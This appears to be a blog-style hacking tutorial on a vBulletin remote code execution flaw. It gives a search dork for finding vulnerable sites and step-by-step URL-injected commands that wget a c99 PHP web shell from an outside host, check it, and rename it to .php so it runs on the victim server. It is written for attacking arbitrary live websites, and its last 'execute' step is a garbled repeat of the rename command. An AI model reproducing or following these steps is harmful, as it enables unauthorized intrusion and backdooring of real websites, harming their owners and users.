It is commonly used in arbitrary code execution vulnerability to describe a software bug that gives an attacker a way to execute arbitrary code. A program that is designed to exploit such vulnerability is called an arbitrary code execution exploit. Most of these vulnerabilities allow the execution of machine code and most exploits therefore inject and execute shell code to give an attacker an easy way to manually run arbitrary commands. The ability to trigger arbitrary code execution from one machine on another (especially via a wide-area network such as the Internet) is often referred to as remote code execution"
~~ vBulletin RCE Injection ~~
Few websites running vBulletin are vulnerable to Remote Code Execution, by exploiting the vulnerability we can get our PHP backdoor shell uploaded on the website.
toxicmask.blogspot.com/2016/11/how-to-hide-shell-using-cmd-and-htaccess.html
We'll use a dork to find the vulnerable website. How to Create Dorks Here is
toxicmask.blogspot.com/2016/10/create-own-dorks-2016-2017-method-to.html
Note: don't keep yourself restricted when it comes to using dorks, use other search engines too other than Google, like Bing, Yahoo etc.
Use of multiple search engines will help you to get more vulnerable websites. Dork is Here
Dork:inurl:faq.php & intext:"Warning: system() [function.system]"
Now, select any website of your choice from the search result, and go to its faq.php page. If the website is vulnerable or not , you will get the following on the page.
You will get an error similar to Warning: system() [function.system]: Cannot execute a blank command in [path]/faq.php(324) : eval()'d code on line 1
So, firstly upload your PHP shell on any free hosting website or you can use sh3ll.org/c99.txt as it has already got an uploaded .txt shell. (We will be first uploading our shell in .txt form, and later will be changing the extension to .php after the upload process is completed.
Suppose the vulnerable website is
http://www.vulnerable.com/faq.php
So in order to upload our shell enter the following in the URL:
http://www.vulnerable.com/faq.php?cmd=cd /tmp;wget http://sh3ll.org/c99.txt
To check if we were able to successfully upload our shell, enter the following in the URL
http://www.vulnerable.com/faq.php?cmd=cd /tmp;ls -la c99.txt
Were c99.txt is the name of your uploaded shell. If we were successful in uploading our shell, we see the following text on the page.
(Might be a little different in some cases)
-rw-r—r—1 nobody nobody
We know that our shell is successful uploaded on the website,
now it's time to change the file format from .txt to .php in order to execute it on the server.
http://www.vulnerable.com/faq.php?cmd=cd /tmp;mv c99.txt check.php
(You can change check.php to any other name of your choice)
Now, the file format is change. It's time to execute shell,
so to execute it enter the following in the URL:
http://www.vulnerable.com/faq.php?cmd=cd /tmp;mv c99.txt check.php
after Uploaded and Checked success. , U can Access any Think. Thanks, If u hav any Question Just Comments.